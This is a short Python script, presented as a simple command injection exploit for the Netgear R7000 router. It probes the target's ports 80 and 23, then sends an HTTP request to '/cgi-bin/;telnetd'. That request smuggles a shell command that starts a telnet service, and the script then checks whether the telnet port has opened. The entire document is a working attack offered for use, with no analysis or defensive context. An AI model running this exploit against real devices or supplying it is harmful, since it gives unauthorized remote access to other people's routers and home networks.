Simple Netgear R7000 Command Injection Exploit

1. #! /usr/bin/python
2.  
3. import socket
4. import sys
5. import requests
6.  
7. #This is a pretty simple exploit, not many modules needed!
8.  
9.  
10. if len(sys.argv) != 2:
11.     print "usage: ./exploit [TARGET]"
12.     sys.exit(1)
13.  
14. host = sys.argv[1]
15.  
16. def checkVuln():
17.     print 'checking host... ',; sys.stdout.flush()
18.     try:
19.         s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
20.         result1 = s1.connect_ex((host, 80))
21.         s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
22.         result2 = s2.connect_ex((host, 23))
23.         s1.close()
24.         s2.close()
25.         if result1 == 0 and result2 != 0:
26.             print 'done'
27.         else:
28.             raise Exception
29.     except Exception:
30.         print 'fail'
31.         sys.exit(1)
32.  
33. def exploit():
34.     print 'attempting exploit... ',; sys.stdout.flush()
35.     try:
36.         request = requests.get('http://' + host + '/cgi-bin/;telnetd')
37.         print 'done'
38.     except Exception:
39.         print 'done'
40.  
41. def verify():
42.     print 'verifying exploitation... ',; sys.stdout.flush()
43.     try:
44.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
45.         result = s.connect_ex((host, 23))
46.         s.close()
47.         if result == 0:
48.             print 'success!'
49.         else:
50.             raise Exception
51.     except Exception:
52.         print 'fail'
53.         sys.exit(1)
54.  
55. checkVuln()
56. exploit()
57. verify()